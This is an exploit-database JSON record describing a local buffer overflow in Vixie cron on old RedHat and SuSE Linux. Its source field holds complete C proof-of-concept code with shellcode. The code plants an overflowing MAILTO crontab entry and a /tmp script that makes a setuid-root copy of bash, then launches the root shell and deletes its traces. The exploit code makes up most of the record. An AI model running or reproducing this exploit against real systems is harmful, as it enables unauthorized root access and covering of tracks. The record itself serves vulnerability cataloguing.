Description
No description provided by source.
{
  "href": "https://www.seebug.org/vuldb/ssvid-73393",
  "status": "poc",
  "bulletinFamily": "exploit",
  "modified": "2014-07-01T00:00:00",
  "title": "RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2)",
  "cvss": {"vector": "NONE", "score": 0.0},
  "sourceHref": "https://www.seebug.org/vuldb/ssvid-73393",
  "cvelist": [],
  "description": "No description provided by source.",
  "viewCount": 3,
  "published": "2014-07-01T00:00:00",
  "sourceData": "\n source: http://www.securityfocus.com/bid/602/info\r\n \r\nThe version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. \r\n\r\n/*\r\n * VixieCron 3.0 Proof of Concept Exploit - w00w00\r\n * \r\n * Not only does Paul give up root with this one, but with his creative use of\r\n * strtok() he actually ends up putting the address of our shellcode in eip.\r\n * \r\n * Many Thanks: Cheez Wiz, Sangfroid\r\n * Thanks: stran9er, Shok\r\n * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00\r\n * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \\\r\n * defacement group here>\r\n * \r\n * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.\r\n * \r\n * -jbowie@el8.org\r\n * \r\n */\r\n \r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <pwd.h>\r\n\r\nchar shellcode[] =\r\n \"\\xeb\\x40\\x5e\\x89\\x76\\x0c\\x31\\xc0\\x89\\x46\\x0b\\x89\\xf3\\xeb\"\r\n \"\\x27w00w00:Ifwewerehackerswedownyourdumbass\\x8d\\x4e\"\r\n \"\\x0c\\x31\\xd2\\x89\\x56\\x16\\xb0\\x0b\\xcd\\x80\\xe8\\xbb\\xff\\xff\"\r\n \"\\xff/tmp/w00w00\";\r\n \r\nint \r\nmain(int argc,char *argv[])\r\n{\r\n FILE *cfile,*tmpfile;\r\n struct stat sbuf;\r\n struct passwd *pw;\r\n int x;\r\n \r\n pw = getpwuid(getuid());\r\n \r\n chdir(pw->pw_dir);\r\n cfile = fopen(\"./cronny\",\"a+\");\r\n tmpfile = fopen(\"/tmp/w00w00\",\"a+\");\r\n \r\n fprintf(cfile,\"MAILTO=\");\r\n for(x=0;x<96;x++)\r\n fprintf(cfile,\"w00w00 \");\r\n fprintf(cfile,\"%s\",shellcode);\r\n fprintf(cfile,\"\\n* * * * * date\\n\");\r\n fflush(cfile);\r\n\r\n fprintf(tmpfile,\"#!/bin/sh\\ncp /bin/bash %s\\nchmod 4755 %s/bash\\n\", pw->pw_dir,pw->pw_dir);\r\n fflush(tmpfile);\r\n \r\n fclose(cfile),fclose(tmpfile);\r\n \r\n chmod(\"/tmp/w00w00\",S_IXUSR|S_IXGRP|S_IXOTH);\r\n \r\n if(!(fork())) {\r\n execl(\"/usr/bin/crontab\",\"crontab\",\"./cronny\",(char *)0);\r\n } else { \r\n printf(\"Waiting for shell be patient....\\n\");\r\n for(;;) {\r\n if(!(stat(\"./bash\",&sbuf))) {\r\n break;\r\n } else { sleep(5); }\r\n } \r\n if((fork())) {\r\n printf(\"Thank you for using w00warez!\\n\");\r\n execl(\"./bash\",\"bash\",(char *)0);\r\n } else { \r\n remove(\"/tmp/w00w00\");\r\n sleep(5);\r\n remove(\"./bash\");\r\n remove(\"./cronny\");\r\n execl(\"/usr/bin/crontab\",\"crontab\",\"-r\",(char *)0);\r\n }\r\n }\r\n}\r\n\n ",
  "id": "SSV:73393",
  "enchantments_done": [],
  "type": "seebug",
  "lastseen": "2017-11-19T16:13:50",
  "reporter": "Root",
  "enchantments": {
    "score": {"value": 0.0, "vector": "NONE"},
    "dependencies": {},
    "backreferences": {},
    "exploitation": null,
    "vulnersScore": 0.0
  },
  "references": [],
  "immutableFields": [],
  "cvss2": {},
  "cvss3": {},
  "_state": {"dependencies": 1645247580, "score": 1659785532}
}